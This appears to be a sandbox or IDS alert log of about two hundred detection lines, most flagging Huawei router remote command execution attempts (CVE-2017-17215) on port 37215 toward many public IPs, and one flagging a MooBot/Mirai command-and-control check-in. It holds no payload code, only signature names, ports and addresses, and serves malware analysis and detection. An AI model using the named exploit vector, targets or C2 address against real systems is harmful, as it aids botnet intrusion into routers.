                                                    07/10/24-08:27:23.956633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500837215192.168.2.14157.135.147.217
                                                    07/10/24-08:27:30.450144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680837215192.168.2.14157.128.19.130
                                                    07/10/24-08:27:27.108573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631637215192.168.2.14157.182.189.248
                                                    07/10/24-08:27:27.164992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4629837215192.168.2.14157.24.141.150
                                                    07/10/24-08:27:32.553741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110637215192.168.2.14168.114.145.163
                                                    07/10/24-08:26:17.939725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437037215192.168.2.141.150.137.34
                                                    07/10/24-08:26:42.363938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578837215192.168.2.1441.65.254.151
                                                    07/10/24-08:27:33.726260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167437215192.168.2.1449.51.231.239
                                                    07/10/24-08:26:43.715321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4152237215192.168.2.14222.116.173.0
                                                    07/10/24-08:26:45.651870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3434437215192.168.2.1490.217.43.116
                                                    07/10/24-08:26:14.810948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203837215192.168.2.1463.252.228.50
                                                    07/10/24-08:27:17.018335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701437215192.168.2.1458.208.209.209
                                                    07/10/24-08:26:13.787067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3376837215192.168.2.14157.120.162.132
                                                    07/10/24-08:27:22.861030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643837215192.168.2.14175.182.171.146
                                                    07/10/24-08:26:53.176697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915437215192.168.2.14126.102.186.175
                                                    07/10/24-08:27:30.538484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619037215192.168.2.14172.152.170.105
                                                    07/10/24-08:26:33.428456TCP2030490ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)505785976192.168.2.1451.79.141.54
                                                    07/10/24-08:26:43.681419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054437215192.168.2.14197.157.46.223
                                                    07/10/24-08:27:13.993407TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5966037215192.168.2.14197.181.49.49
                                                    07/10/24-08:26:31.086476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406037215192.168.2.1441.190.93.133
                                                    07/10/24-08:27:32.587854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189037215192.168.2.14197.222.127.137
                                                    07/10/24-08:26:43.809234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4295037215192.168.2.14157.52.90.100
                                                    07/10/24-08:26:11.500139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4141437215192.168.2.14157.26.3.225
                                                    07/10/24-08:26:13.822021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398437215192.168.2.14197.106.243.39
                                                    07/10/24-08:26:43.722420TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274237215192.168.2.14108.13.199.136
                                                    07/10/24-08:26:33.220659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965037215192.168.2.14157.51.0.135
                                                    07/10/24-08:26:11.590695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.14130.62.248.59
                                                    07/10/24-08:27:22.772225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5045237215192.168.2.14157.159.136.221
                                                    07/10/24-08:26:13.847797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734437215192.168.2.14157.58.224.54
                                                    07/10/24-08:26:33.171113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541237215192.168.2.14197.147.85.95
                                                    07/10/24-08:27:27.094763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314037215192.168.2.1441.249.10.144
                                                    07/10/24-08:27:28.147749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970437215192.168.2.14197.68.129.121
                                                    07/10/24-08:26:23.348591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554037215192.168.2.14155.155.116.122
                                                    07/10/24-08:27:07.376255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699637215192.168.2.1441.127.215.20
                                                    07/10/24-08:26:53.202562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5657437215192.168.2.14157.50.6.71
                                                    07/10/24-08:27:20.451550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520237215192.168.2.14197.210.73.68
                                                    07/10/24-08:26:41.606068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4679237215192.168.2.14157.11.183.228
                                                    07/10/24-08:27:08.383825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5687237215192.168.2.14197.105.238.106
                                                    07/10/24-08:26:34.188180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3749637215192.168.2.1441.140.117.129
                                                    07/10/24-08:26:57.655125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5002037215192.168.2.1441.134.198.201
                                                    07/10/24-08:26:43.527873TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832437215192.168.2.14197.249.115.174
                                                    07/10/24-08:26:23.353387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5223837215192.168.2.14157.21.144.112
                                                    07/10/24-08:27:14.028611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142837215192.168.2.14197.39.214.253
                                                    07/10/24-08:26:36.360121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5122637215192.168.2.1441.162.134.206
                                                    07/10/24-08:26:57.680054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5509237215192.168.2.14157.31.52.169
                                                    07/10/24-08:27:30.522972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710237215192.168.2.1441.62.143.187
                                                    07/10/24-08:27:02.770839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934437215192.168.2.14197.133.27.61
                                                    07/10/24-08:26:53.228300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5431837215192.168.2.14197.62.130.3
                                                    07/10/24-08:27:33.889339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834037215192.168.2.14197.163.244.42
                                                    07/10/24-08:26:28.633014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010837215192.168.2.14157.221.158.69
                                                    07/10/24-08:26:36.360121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4165837215192.168.2.14197.184.139.102
                                                    07/10/24-08:27:11.527013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336037215192.168.2.14197.58.52.85
                                                    07/10/24-08:27:22.862864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183437215192.168.2.1441.200.180.192
                                                    07/10/24-08:26:31.056183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963237215192.168.2.14102.140.16.5
                                                    07/10/24-08:27:08.432094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5007837215192.168.2.14197.25.181.129
                                                    07/10/24-08:26:15.834520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740037215192.168.2.14197.187.183.116
                                                    07/10/24-08:26:57.665893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5182437215192.168.2.14157.179.54.143
                                                    07/10/24-08:26:23.287711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4398637215192.168.2.14197.180.64.170
                                                    07/10/24-08:26:15.805311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5221837215192.168.2.14197.95.19.161
                                                    07/10/24-08:26:36.414477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540237215192.168.2.1441.250.30.52
                                                    07/10/24-08:26:49.817935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113037215192.168.2.14197.236.130.54
                                                    07/10/24-08:27:20.474146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709237215192.168.2.14157.37.34.59
                                                    07/10/24-08:26:53.207305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247637215192.168.2.1441.67.20.56
                                                    07/10/24-08:27:23.965651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3931037215192.168.2.1441.63.161.6
                                                    07/10/24-08:26:13.816955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805837215192.168.2.1441.178.8.111
                                                    07/10/24-08:27:07.254961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826037215192.168.2.1483.28.242.92
                                                    07/10/24-08:27:24.872806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4970637215192.168.2.14197.156.109.140
                                                    07/10/24-08:27:28.176056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5530837215192.168.2.14157.101.130.193
                                                    07/10/24-08:27:17.044198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4707037215192.168.2.1441.189.75.50
                                                    07/10/24-08:27:27.126836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870837215192.168.2.14204.60.115.180
                                                    07/10/24-08:26:17.978087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080437215192.168.2.1441.184.251.250
                                                    07/10/24-08:26:28.927814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177037215192.168.2.1441.13.41.19
                                                    07/10/24-08:26:49.900161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3715037215192.168.2.1441.6.120.105
                                                    07/10/24-08:26:43.872861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056437215192.168.2.1463.128.24.198
                                                    07/10/24-08:26:53.210385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3993237215192.168.2.1441.186.115.131
                                                    07/10/24-08:26:26.537875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450237215192.168.2.1474.30.5.144
                                                    07/10/24-08:27:08.383714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494437215192.168.2.14197.14.126.161
                                                    07/10/24-08:27:23.457605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919437215192.168.2.1439.177.193.153
                                                    07/10/24-08:26:42.352780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4103637215192.168.2.14157.81.206.243
                                                    07/10/24-08:26:13.833897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911037215192.168.2.14197.104.98.226
                                                    07/10/24-08:26:18.037951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4480637215192.168.2.1441.87.191.164
                                                    07/10/24-08:26:55.302858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3994637215192.168.2.14197.233.97.223
                                                    07/10/24-08:26:25.454213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395837215192.168.2.1441.246.37.196
                                                    07/10/24-08:26:57.593723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572037215192.168.2.1441.60.208.123
                                                    07/10/24-08:27:23.930240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3543637215192.168.2.1488.20.81.28
                                                    07/10/24-08:26:25.468453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713237215192.168.2.14151.123.199.16
                                                    07/10/24-08:27:24.970065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272437215192.168.2.1438.15.42.197
                                                    07/10/24-08:26:20.192281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4445237215192.168.2.14197.33.126.245
                                                    07/10/24-08:27:05.200301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116637215192.168.2.1441.222.17.188
                                                    07/10/24-08:26:15.806534TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4363837215192.168.2.1441.237.161.138
                                                    07/10/24-08:26:43.680100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192437215192.168.2.14197.27.212.215
                                                    07/10/24-08:26:43.702243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015237215192.168.2.14169.190.237.31
                                                    07/10/24-08:26:59.542620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3655237215192.168.2.1441.230.53.23
                                                    07/10/24-08:27:27.077198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197437215192.168.2.14157.246.255.113
                                                    07/10/24-08:27:33.778513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584837215192.168.2.14204.6.73.56
                                                    07/10/24-08:26:48.010127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387837215192.168.2.14191.105.84.104
                                                    07/10/24-08:26:29.873884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3700837215192.168.2.1441.108.47.8
                                                    07/10/24-08:26:28.750932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626437215192.168.2.14197.182.12.171
                                                    07/10/24-08:26:18.023692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371637215192.168.2.14197.132.199.94
                                                    07/10/24-08:26:23.304428TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4804837215192.168.2.1436.92.21.55
                                                    07/10/24-08:27:08.392562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3746037215192.168.2.14197.41.242.85
                                                    07/10/24-08:26:17.966434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827037215192.168.2.1441.152.66.39
                                                    07/10/24-08:27:33.915433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5356037215192.168.2.14197.6.179.116
                                                    07/10/24-08:26:20.110888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349037215192.168.2.14157.115.87.176
                                                    07/10/24-08:27:19.166919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5463437215192.168.2.1441.148.149.77
                                                    07/10/24-08:27:32.611933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453437215192.168.2.1484.4.223.83
                                                    07/10/24-08:27:02.772375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3905037215192.168.2.1441.118.161.250
                                                    07/10/24-08:26:20.183913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5834637215192.168.2.14157.202.243.207
                                                    07/10/24-08:27:27.081335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623237215192.168.2.14157.35.29.202
                                                    07/10/24-08:27:11.531536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577037215192.168.2.14157.154.21.146
                                                    07/10/24-08:27:22.933936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4167237215192.168.2.14128.40.91.38
                                                    07/10/24-08:26:14.763197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4895437215192.168.2.1441.183.124.229
                                                    07/10/24-08:26:17.962389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589837215192.168.2.14211.39.197.24
                                                    07/10/24-08:26:59.703676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934437215192.168.2.1464.186.100.95
                                                    07/10/24-08:26:59.628167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5925037215192.168.2.1441.68.31.142
                                                    07/10/24-08:27:19.253799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5648037215192.168.2.14157.77.106.14
                                                    07/10/24-08:27:31.479319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5083637215192.168.2.1441.130.130.114
                                                    07/10/24-08:26:31.095355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3902437215192.168.2.1441.156.141.49
                                                    07/10/24-08:27:02.942445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563237215192.168.2.14121.20.112.240
                                                    07/10/24-08:26:52.024313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885037215192.168.2.14157.50.120.30
                                                    07/10/24-08:26:59.522844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898837215192.168.2.14197.131.89.224
                                                    07/10/24-08:27:07.344917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3438237215192.168.2.1453.244.61.151
                                                    07/10/24-08:27:22.917695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5015237215192.168.2.1454.42.69.238
                                                    07/10/24-08:26:14.801295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093437215192.168.2.1441.143.220.37
                                                    07/10/24-08:26:23.332526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012037215192.168.2.14157.11.176.97
                                                    07/10/24-08:26:45.603299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822637215192.168.2.1446.122.180.152
                                                    07/10/24-08:26:13.645814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5212037215192.168.2.14197.197.191.70
                                                    07/10/24-08:26:49.844556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3587437215192.168.2.14157.105.217.65
                                                    07/10/24-08:26:45.616284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3440037215192.168.2.14197.124.172.237
                                                    07/10/24-08:26:31.091003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5195637215192.168.2.14197.71.30.221
                                                    07/10/24-08:26:42.425783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4000437215192.168.2.14157.78.142.100
                                                    07/10/24-08:27:28.165793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930037215192.168.2.1424.214.181.63
                                                    07/10/24-08:26:29.851044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517237215192.168.2.14197.139.104.63
                                                    07/10/24-08:27:21.455167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3437437215192.168.2.1453.75.57.149
                                                    07/10/24-08:27:33.831803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5243637215192.168.2.14157.32.28.164
                                                    07/10/24-08:26:55.372115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077037215192.168.2.14157.77.237.224
                                                    07/10/24-08:26:17.998303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515837215192.168.2.1441.177.242.19
                                                    07/10/24-08:26:25.502478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5465837215192.168.2.1441.173.159.5
                                                    07/10/24-08:27:22.476492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924837215192.168.2.1441.125.173.84
                                                    07/10/24-08:26:20.188870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734637215192.168.2.14197.61.254.216
                                                    07/10/24-08:26:11.657674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950837215192.168.2.14157.253.160.119
                                                    07/10/24-08:26:41.600152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4236837215192.168.2.1441.28.23.90
                                                    07/10/24-08:27:05.237308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388637215192.168.2.14157.38.154.23
                                                    07/10/24-08:26:55.302858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366437215192.168.2.14197.35.197.30
                                                    07/10/24-08:27:13.843143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186837215192.168.2.14200.153.82.199
                                                    07/10/24-08:27:30.505876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576237215192.168.2.14157.151.163.28
                                                    07/10/24-08:26:36.417902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814637215192.168.2.1441.164.122.99
                                                    07/10/24-08:27:31.446211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4916437215192.168.2.14157.210.55.48
                                                    07/10/24-08:26:36.385173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4274637215192.168.2.14197.6.209.10
                                                    07/10/24-08:26:14.805928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724237215192.168.2.1441.154.61.145
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084037215192.168.2.14157.148.111.243
                                                    07/10/24-08:26:36.389653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6024037215192.168.2.1441.224.11.132
                                                    07/10/24-08:27:07.393644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3839237215192.168.2.14157.201.19.145
                                                    07/10/24-08:27:14.865428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6038637215192.168.2.14219.193.211.214
                                                    07/10/24-08:27:23.915755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047237215192.168.2.14197.183.105.200
                                                    07/10/24-08:26:51.960962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259437215192.168.2.1441.14.245.184
                                                    07/10/24-08:26:59.598591TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5945237215192.168.2.14197.61.174.158
                                                    07/10/24-08:26:43.772069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173037215192.168.2.14105.173.218.209
                                                    07/10/24-08:27:08.357812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4159637215192.168.2.1441.128.11.151
                                                    07/10/24-08:26:25.453697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540437215192.168.2.14197.84.64.127
                                                    07/10/24-08:27:31.453868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5041637215192.168.2.149.70.127.199
                                                    07/10/24-08:26:47.939278TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425037215192.168.2.14133.85.85.174
                                                    07/10/24-08:26:33.217232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099837215192.168.2.14157.220.48.19
                                                    07/10/24-08:26:55.397639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5963437215192.168.2.1441.245.201.227
                                                    07/10/24-08:27:34.136895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659437215192.168.2.1441.148.15.235
                                                    07/10/24-08:26:14.815685TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298437215192.168.2.14197.204.243.61
                                                    07/10/24-08:26:25.519002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405837215192.168.2.1441.66.240.75
                                                    07/10/24-08:26:14.803775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4762637215192.168.2.14197.33.87.216
                                                    07/10/24-08:27:14.815899TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870037215192.168.2.14197.73.160.146
                                                    07/10/24-08:26:43.574763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967437215192.168.2.1441.170.62.200
                                                    07/10/24-08:27:07.376738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096237215192.168.2.14157.108.101.99
                                                    07/10/24-08:27:30.527046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5353037215192.168.2.14145.38.76.5
                                                    07/10/24-08:26:18.039124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3449837215192.168.2.14197.131.24.64
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576437215192.168.2.14157.72.133.123
                                                    07/10/24-08:26:14.623389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335237215192.168.2.14157.18.107.179
                                                    07/10/24-08:27:11.503396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548237215192.168.2.1446.175.36.202
                                                    07/10/24-08:26:38.569850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925037215192.168.2.14157.132.190.107
                                                    07/10/24-08:27:22.812870TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4234637215192.168.2.14116.225.4.197
                                                    07/10/24-08:26:38.594017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3390237215192.168.2.14197.95.113.167
                                                    07/10/24-08:26:51.975524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152037215192.168.2.1441.139.191.29
                                                    07/10/24-08:27:33.834313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746037215192.168.2.14157.221.203.149
                                                    07/10/24-08:26:59.553942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5543437215192.168.2.14197.246.23.153
                                                    07/10/24-08:27:20.498164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3782237215192.168.2.14149.160.27.225
                                                    07/10/24-08:26:26.605186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846637215192.168.2.1437.23.38.205
                                                    07/10/24-08:26:25.479456TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4346237215192.168.2.14197.180.234.31
